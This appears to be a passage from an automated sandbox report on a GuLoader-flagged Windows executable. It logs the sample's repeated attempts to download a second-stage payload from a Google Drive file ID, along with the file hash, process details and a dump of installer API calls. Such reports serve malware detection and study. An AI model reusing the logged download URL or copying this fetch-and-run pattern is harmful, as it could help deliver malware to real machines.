                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xvwkLPJPADtqDjhO_OufZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.7 | 49988 | 172.217.19.174 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:49 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:50 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:49 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-Zy-P21aNSe5Br9Zty2x-xA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.7 | 49989 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:51 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:52 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC63_ABeOyhN79BUDBkuYyX9zupD_qrJF-zuc8NHo0436bpUwrZQp317f3biZ5zAHer0
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:52 GMT
                                                Content-Security-Policy: script-src 'nonce-iP3oqmutDjyUbAnCZO8YyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:52 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HmT0G7riNUAR-GqoTNI5Cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.7 | 49990 | 172.217.19.174 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:08:04 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:08:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:08:05 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-J4wJNlLvhOAqJUaQ1HHgjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.2.7 | 49991 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:08:07 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:08:08 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC67My6R1xBplI3UdqAoeNBkzyR7aa_TDIFl4BxQLhgf3regiMYVCAd6lUatu2MkZrxY
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:08:07 GMT
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-kqs4NCbSAl4Fz1p_SYrTvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:08:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CPCr2nuKxkN7fLjncmJ5XA">*{margin:0;padding:0}html,code{font:15px/22px arial



                                                Target ID:4
                                                Start time:12:05:09
                                                Start date:16/12/2024
                                                Path:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
                                                Imagebase:0x400000
                                                File size:511'843 bytes
                                                MD5 hash:23F5026EF6B69B601F982F0498E02DDB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1471777576.0000000009256000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:12:05:28
                                                Start date:16/12/2024
                                                Path:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
                                                Imagebase:0x400000
                                                File size:511'843 bytes
                                                MD5 hash:23F5026EF6B69B601F982F0498E02DDB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3137684124.0000000005DE6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:20.1%
                                                  Dynamic/Decrypted Code Coverage:13.8%
                                                  Signature Coverage:20.8%
                                                  Total number of Nodes:1528
                                                  Total number of Limit Nodes:41
4376 405f6a 18 API calls 4374->4376 4377 405f6a 18 API calls 4375->4377 4378 4018d1 lstrcatW 4376->4378 4379 4018e4 4377->4379 4378->4379 4382 405724 MessageBoxIndirectW 4379->4382 4381->4365 4381->4383 4382->4383 4384->4361 4386 403072 SetFilePointer 4385->4386 4387 40308e 4385->4387 4386->4387 4406 40317d GetTickCount 4387->4406 4390 405c37 ReadFile 4391 4030ae 4390->4391 4392 40317d 43 API calls 4391->4392 4399 40188d 4391->4399 4393 4030c5 4392->4393 4394 4030d5 4393->4394 4395 40313f ReadFile 4393->4395 4393->4399 4397 405c37 ReadFile 4394->4397 4398 403108 WriteFile 4394->4398 4394->4399 4395->4399 4397->4394 4398->4394 4398->4399 4399->4369 4399->4372 4400->4352 4401->4353 4403 405739 4402->4403 4404 405785 4403->4404 4405 40574d MessageBoxIndirectW 4403->4405 4404->4361 4405->4404 4407 4032e7 4406->4407 4408 4031ac 4406->4408 4409 402d1a 33 API calls 4407->4409 4419 40330f SetFilePointer 4408->4419 4415 403095 4409->4415 4411 4031b7 SetFilePointer 4417 4031dc 4411->4417 4415->4390 4415->4399 4416 403271 WriteFile 4416->4415 4416->4417 4417->4415 4417->4416 4418 4032c8 SetFilePointer 4417->4418 4420 4032f9 4417->4420 4423 4063ee 4417->4423 4430 402d1a 4417->4430 4418->4407 4419->4411 4421 405c37 ReadFile 4420->4421 4422 40330c 4421->4422 4422->4417 4424 406413 4423->4424 4427 40641b 4423->4427 4424->4417 4425 4064a2 GlobalFree 4426 4064ab GlobalAlloc 4425->4426 4426->4424 4426->4427 4427->4424 4427->4425 4427->4426 4428 406522 GlobalAlloc 4427->4428 4429 406519 GlobalFree 4427->4429 4428->4424 4428->4427 4429->4428 4431 402d43 4430->4431 4432 402d2b 4430->4432 4434 402d53 GetTickCount 4431->4434 4435 402d4b 4431->4435 4433 402d34 DestroyWindow 4432->4433 4438 402d3b 4432->4438 4433->4438 4437 402d61 4434->4437 4434->4438 4445 4062eb 4435->4445 4439 402d96 CreateDialogParamW ShowWindow 4437->4439 4440 402d69 4437->4440 4438->4417 4439->4438 4440->4438 4449 402cfe 4440->4449 4442 402d77 wsprintfW 4443 4051f2 25 API calls 4442->4443 4444 402d94 4443->4444 
4444->4438 4446 406308 PeekMessageW 4445->4446 4447 406318 4446->4447 4448 4062fe DispatchMessageW 4446->4448 4447->4438 4448->4446 4450 402d0d 4449->4450 4451 402d0f MulDiv 4449->4451 4450->4451 4451->4442 4452 402253 4453 402261 4452->4453 4454 40225b 4452->4454 4456 402b3a 18 API calls 4453->4456 4459 40226f 4453->4459 4455 402b3a 18 API calls 4454->4455 4455->4453 4456->4459 4457 40227d 4458 402b3a 18 API calls 4457->4458 4461 402286 WritePrivateProfileStringW 4458->4461 4459->4457 4460 402b3a 18 API calls 4459->4460 4460->4457 5067 402454 5068 402c44 19 API calls 5067->5068 5069 40245e 5068->5069 5070 402b1d 18 API calls 5069->5070 5071 402467 5070->5071 5072 40248b RegEnumValueW 5071->5072 5073 40247f RegEnumKeyW 5071->5073 5074 402793 5071->5074 5072->5074 5075 4024a4 RegCloseKey 5072->5075 5073->5075 5075->5074 5077 401ed4 5078 402b3a 18 API calls 5077->5078 5079 401edb 5078->5079 5080 40628b 2 API calls 5079->5080 5081 401ee1 5080->5081 5082 401ef2 5081->5082 5084 405e8f wsprintfW 5081->5084 5084->5082 4475 4022d5 4476 402305 4475->4476 4477 4022da 4475->4477 4479 402b3a 18 API calls 4476->4479 4478 402c44 19 API calls 4477->4478 4480 4022e1 4478->4480 4481 40230c 4479->4481 4482 4022eb 4480->4482 4486 402322 4480->4486 4487 402b7a RegOpenKeyExW 4481->4487 4483 402b3a 18 API calls 4482->4483 4485 4022f2 RegDeleteValueW RegCloseKey 4483->4485 4485->4486 4488 402c0e 4487->4488 4492 402ba5 4487->4492 4488->4486 4489 402bcb RegEnumKeyW 4490 402bdd RegCloseKey 4489->4490 4489->4492 4493 4062b2 3 API calls 4490->4493 4491 402c02 RegCloseKey 4495 402bf1 4491->4495 4492->4489 4492->4490 4492->4491 4494 402b7a 3 API calls 4492->4494 4496 402bed 4493->4496 4494->4492 4495->4488 4496->4495 4497 402c1d RegDeleteKeyW 4496->4497 4497->4495 4505 4014d7 4506 402b1d 18 API calls 4505->4506 4507 4014dd Sleep 4506->4507 4509 4029c7 4507->4509 4721 40335a #17 SetErrorMode OleInitialize 4722 4062b2 3 API calls 4721->4722 4723 40339d SHGetFileInfoW 4722->4723 4796 405f48 
lstrcpynW 4723->4796 4725 4033c8 GetCommandLineW 4797 405f48 lstrcpynW 4725->4797 4727 4033da GetModuleHandleW 4728 4033f4 4727->4728 4729 4059c0 CharNextW 4728->4729 4730 403402 CharNextW 4729->4730 4738 403414 4730->4738 4731 403516 4732 40352a GetTempPathW 4731->4732 4798 403326 4732->4798 4734 403542 4735 403546 GetWindowsDirectoryW lstrcatW 4734->4735 4736 40359c DeleteFileW 4734->4736 4739 403326 11 API calls 4735->4739 4806 402dbc GetTickCount GetModuleFileNameW 4736->4806 4737 4059c0 CharNextW 4737->4738 4738->4731 4738->4737 4744 403518 4738->4744 4741 403562 4739->4741 4741->4736 4743 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4741->4743 4742 4035b0 4750 4059c0 CharNextW 4742->4750 4779 403653 4742->4779 4791 403663 4742->4791 4746 403326 11 API calls 4743->4746 4890 405f48 lstrcpynW 4744->4890 4749 403594 4746->4749 4749->4736 4749->4791 4762 4035cf 4750->4762 4752 403772 4755 403815 ExitProcess 4752->4755 4760 4062b2 3 API calls 4752->4760 4753 40367c 4754 405724 MessageBoxIndirectW 4753->4754 4756 40368a ExitProcess 4754->4756 4757 403692 lstrcatW lstrcmpiW 4764 4036ae CreateDirectoryW SetCurrentDirectoryW 4757->4764 4757->4791 4758 40362d 4763 405a9b 18 API calls 4758->4763 4761 403785 4760->4761 4765 4062b2 3 API calls 4761->4765 4762->4757 4762->4758 4766 403639 4763->4766 4767 4036d1 4764->4767 4768 4036c6 4764->4768 4769 40378e 4765->4769 4766->4791 4891 405f48 lstrcpynW 4766->4891 4903 405f48 lstrcpynW 4767->4903 4902 405f48 lstrcpynW 4768->4902 4772 4062b2 3 API calls 4769->4772 4774 403797 4772->4774 4776 4037b5 4774->4776 4784 4037a5 GetCurrentProcess 4774->4784 4775 403648 4892 405f48 lstrcpynW 4775->4892 4780 4062b2 3 API calls 4776->4780 4778 405f6a 18 API calls 4781 403710 DeleteFileW 4778->4781 4836 40391f 4779->4836 4782 4037ec 4780->4782 4783 40371d CopyFileW 4781->4783 4793 4036df 4781->4793 4785 403801 ExitWindowsEx 4782->4785 4788 40380e 4782->4788 4783->4793 4784->4776 4785->4755 4785->4788 4786 
403766 4789 405de2 40 API calls 4786->4789 4787 405de2 40 API calls 4787->4793 4790 40140b 2 API calls 4788->4790 4789->4791 4790->4755 4893 40382d 4791->4893 4792 405f6a 18 API calls 4792->4793 4793->4778 4793->4786 4793->4787 4793->4792 4795 403751 CloseHandle 4793->4795 4904 4056c3 CreateProcessW 4793->4904 4795->4793 4796->4725 4797->4727 4799 4061dc 5 API calls 4798->4799 4800 403332 4799->4800 4801 40333c 4800->4801 4802 405993 3 API calls 4800->4802 4801->4734 4803 403344 CreateDirectoryW 4802->4803 4907 405be3 4803->4907 4911 405bb4 GetFileAttributesW CreateFileW 4806->4911 4808 402dff 4835 402e0c 4808->4835 4912 405f48 lstrcpynW 4808->4912 4810 402e22 4811 4059df 2 API calls 4810->4811 4812 402e28 4811->4812 4913 405f48 lstrcpynW 4812->4913 4814 402e33 GetFileSize 4815 402f34 4814->4815 4833 402e4a 4814->4833 4816 402d1a 33 API calls 4815->4816 4817 402f3b 4816->4817 4819 402f77 GlobalAlloc 4817->4819 4817->4835 4915 40330f SetFilePointer 4817->4915 4818 4032f9 ReadFile 4818->4833 4821 402f8e 4819->4821 4820 402fcf 4822 402d1a 33 API calls 4820->4822 4825 405be3 2 API calls 4821->4825 4822->4835 4824 402f58 4826 4032f9 ReadFile 4824->4826 4828 402f9f CreateFileW 4825->4828 4829 402f63 4826->4829 4827 402d1a 33 API calls 4827->4833 4830 402fd9 4828->4830 4828->4835 4829->4819 4829->4835 4914 40330f SetFilePointer 4830->4914 4832 402fe7 4834 403062 46 API calls 4832->4834 4833->4815 4833->4818 4833->4820 4833->4827 4833->4835 4834->4835 4835->4742 4837 4062b2 3 API calls 4836->4837 4838 403933 4837->4838 4839 403939 4838->4839 4840 40394b 4838->4840 4925 405e8f wsprintfW 4839->4925 4841 405e15 3 API calls 4840->4841 4842 40397b 4841->4842 4844 40399a lstrcatW 4842->4844 4846 405e15 3 API calls 4842->4846 4845 403949 4844->4845 4916 403bf5 4845->4916 4846->4844 4849 405a9b 18 API calls 4850 4039cc 4849->4850 4851 403a60 4850->4851 4853 405e15 3 API calls 4850->4853 4852 405a9b 18 API calls 4851->4852 4854 403a66 4852->4854 4855 4039fe 4853->4855 4856 403a76 
LoadImageW 4854->4856 4857 405f6a 18 API calls 4854->4857 4855->4851 4860 403a1f lstrlenW 4855->4860 4864 4059c0 CharNextW 4855->4864 4858 403b1c 4856->4858 4859 403a9d RegisterClassW 4856->4859 4857->4856 4863 40140b 2 API calls 4858->4863 4861 403ad3 SystemParametersInfoW CreateWindowExW 4859->4861 4862 403b26 4859->4862 4865 403a53 4860->4865 4866 403a2d lstrcmpiW 4860->4866 4861->4858 4862->4791 4867 403b22 4863->4867 4868 403a1c 4864->4868 4870 405993 3 API calls 4865->4870 4866->4865 4869 403a3d GetFileAttributesW 4866->4869 4867->4862 4872 403bf5 19 API calls 4867->4872 4868->4860 4871 403a49 4869->4871 4873 403a59 4870->4873 4871->4865 4874 4059df 2 API calls 4871->4874 4875 403b33 4872->4875 4926 405f48 lstrcpynW 4873->4926 4874->4865 4877 403bc2 4875->4877 4878 403b3f ShowWindow LoadLibraryW 4875->4878 4881 4052c5 5 API calls 4877->4881 4879 403b65 GetClassInfoW 4878->4879 4880 403b5e LoadLibraryW 4878->4880 4882 403b79 GetClassInfoW RegisterClassW 4879->4882 4883 403b8f DialogBoxParamW 4879->4883 4880->4879 4884 403bc8 4881->4884 4882->4883 4885 40140b 2 API calls 4883->4885 4886 403be4 4884->4886 4887 403bcc 4884->4887 4885->4862 4888 40140b 2 API calls 4886->4888 4887->4862 4889 40140b 2 API calls 4887->4889 4888->4862 4889->4862 4890->4732 4891->4775 4892->4779 4894 403848 4893->4894 4895 40383e CloseHandle 4893->4895 4896 403852 CloseHandle 4894->4896 4897 40385c 4894->4897 4895->4894 4896->4897 4928 40388a 4897->4928 4900 4057d0 71 API calls 4901 40366c OleUninitialize 4900->4901 4901->4752 4901->4753 4902->4767 4903->4793 4905 4056f2 CloseHandle 4904->4905 4906 4056fe 4904->4906 4905->4906 4906->4793 4908 405bf0 GetTickCount GetTempFileNameW 4907->4908 4909 405c26 4908->4909 4910 403358 4908->4910 4909->4908 4909->4910 4910->4734 4911->4808 4912->4810 4913->4814 4914->4832 4915->4824 4917 403c09 4916->4917 4927 405e8f wsprintfW 4917->4927 4919 403c7a 4920 405f6a 18 API calls 4919->4920 4921 403c86 SetWindowTextW 4920->4921 4922 403ca2 4921->4922 
4923 4039aa 4921->4923 4922->4923 4924 405f6a 18 API calls 4922->4924 4923->4849 4924->4922 4925->4845 4926->4851 4927->4919 4929 403898 4928->4929 4930 40389d FreeLibrary GlobalFree 4929->4930 4931 403861 4929->4931 4930->4930 4930->4931 4931->4900 5092 40155b 5093 40296d 5092->5093 5096 405e8f wsprintfW 5093->5096 5095 402972 5096->5095 5097 4038dd 5098 4038e8 5097->5098 5099 4038ec 5098->5099 5100 4038ef GlobalAlloc 5098->5100 5100->5099 5101 40165e 5102 402b3a 18 API calls 5101->5102 5103 401665 5102->5103 5104 402b3a 18 API calls 5103->5104 5105 40166e 5104->5105 5106 402b3a 18 API calls 5105->5106 5107 401677 MoveFileW 5106->5107 5108 401683 5107->5108 5109 40168a 5107->5109 5111 401423 25 API calls 5108->5111 5110 40628b 2 API calls 5109->5110 5113 402197 5109->5113 5112 401699 5110->5112 5111->5113 5112->5113 5114 405de2 40 API calls 5112->5114 5114->5108 3946 4023e0 3957 402c44 3946->3957 3948 4023ea 3961 402b3a 3948->3961 3951 4023fe RegQueryValueExW 3952 40241e 3951->3952 3956 402424 RegCloseKey 3951->3956 3952->3956 3967 405e8f wsprintfW 3952->3967 3953 402793 3956->3953 3958 402b3a 18 API calls 3957->3958 3959 402c5d 3958->3959 3960 402c6b RegOpenKeyExW 3959->3960 3960->3948 3962 402b46 3961->3962 3968 405f6a 3962->3968 3965 4023f3 3965->3951 3965->3953 3967->3956 3984 405f77 3968->3984 3969 4061c2 3970 402b67 3969->3970 4002 405f48 lstrcpynW 3969->4002 3970->3965 3986 4061dc 3970->3986 3972 40602a GetVersion 3972->3984 3973 406190 lstrlenW 3973->3984 3974 405f6a 10 API calls 3974->3973 3978 4060a5 GetSystemDirectoryW 3978->3984 3979 4060b8 GetWindowsDirectoryW 3979->3984 3980 4061dc 5 API calls 3980->3984 3981 405f6a 10 API calls 3981->3984 3982 406131 lstrcatW 3982->3984 3983 4060ec SHGetSpecialFolderLocation 3983->3984 3985 406104 SHGetPathFromIDListW CoTaskMemFree 3983->3985 3984->3969 3984->3972 3984->3973 3984->3974 3984->3978 3984->3979 3984->3980 3984->3981 3984->3982 3984->3983 3995 405e15 RegOpenKeyExW 3984->3995 4000 405e8f wsprintfW 
